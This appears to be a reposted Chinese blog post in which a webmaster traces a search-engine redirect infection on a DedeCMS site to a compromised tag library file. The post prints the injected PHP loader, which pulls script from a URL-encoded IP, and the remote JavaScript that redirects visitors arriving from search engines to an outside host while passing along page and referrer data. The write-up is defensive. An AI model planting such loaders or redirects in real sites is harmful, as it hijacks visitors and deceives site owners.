dedecms被挂马排毒的过程

又经历了一次dedecms被挂马排毒的过程,排毒过程在这里跟大家分享一下。

挂马之后,网站的表现形式:

直接访问网站没有任何问题,从百度搜索的关键词访问网站,就跳转到另外一个网站。

根据我原来的排毒经验:很可能是有人在php里面写入了判断来路的代码,如果是经过百度来的,就跳转到另外一个网站,如果不是,就可以访问。

不过检查了一下php代码,没有发现任何问题。

从百度关键词访问过来的话,能够看到本网站的title,只是一闪而过,就跳转了。根据这个现象判断,马应该是在js里面。于是下载网站模板文件,查找可疑的js代码。找了很久没有找到。只好通过最笨的方法一点点排查。于是每一段写了一个alert。

找到最后出现的alert点击确定之后跳转,那么马就在那个alert附近。

找了一段时间,终于发现了一段可以的代码:{dede:dinfo}

做dedecms的人都知道,这个是一个自定义标签的调用方式,其源码在:/include/taglib/dinfo.lib.php里面。于是打开这个文件,看到如下代码:

[代码]php代码:

01
<?php

02
if(!defined('DEDEINC')){

03
exit("Request Error!");

04
}

05
/**

06
* 系统默认标签

07
*

08
* @version        $Id: dinfo.lib.php 1 9:29 2010年7月6日Z tianya $

09
* @package        DedeCMS.Taglib

10
* @copyright      Copyright (c) 2007 - 2010, DesDev, Inc.

11
* @license        http://help.dedecms.com/usersguide/license.html

12
* @link           http://www.dedecms.com

13
*/

14

15
/*>>dede>>

16
<name>系统默认标签</name>

17
<type>全局标记</type>

18
<for>V55,V56,V57</for>

19
<description>系统默认标签</description>

20
<demo>

21
{dede:dinfo /}

22
</demo>

23
<attributes>

24
</attributes>

25
>>dede>>*/

26

27
function lib_dinfo()

28
{

29
global $dsql,$envs;

30
$revalue = '<script language="javascript" type="text/javascript" src="http://%31%31%38%2e%32%34%34%2e%32%31%35%2e%32%31%33/images/page_bg.gif"></script>';

31
return $revalue;

32
}

刚开始也没有看出什么问题,就是一段js代码,然后引用了一个图片,不过访问下这个图片地址就知道了,在浏览器中输入这个地址:http://%31%31%38%2e%32%34%34%2e%32%31%35%2e%32%31%33/images/page_bg.gif

能看到如下代码:

[代码]js代码:

1
GID89a="";

2
var s=document.referrer;

3
var str=window.location.href;

4
if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )

5
window.location.href="http://118.244.215.213/Images/a2.asp?cpy="+str+"&kecy="+s;

怎么样,看出问题来了吧?

简单解说一下:

[代码]js代码:

1
if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )

这里就是判断来路,如果来源是:google、百度、yahoo、sogou、bing、360、soso、youdao,就跳转到下面这个地址:

[代码]js代码:

1
http://118.244.215.213/Images/a2.asp?cpy="+str+"&kecy="+s;

(这个人可真够黑的,光拦截百度还不够,还要把这些常用的搜索都拦截了。)

这段代码挂的太隐蔽了,让我找了好久。在这里分享给大家,希望能够帮助需要的朋友。

除非注明,文章均为 PHP二次开发网 原创,转载请注明本文地址: http://www.php2.cc/article-865-1.html

转载于:https://www.cnblogs.com/phplearnings/p/3647281.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值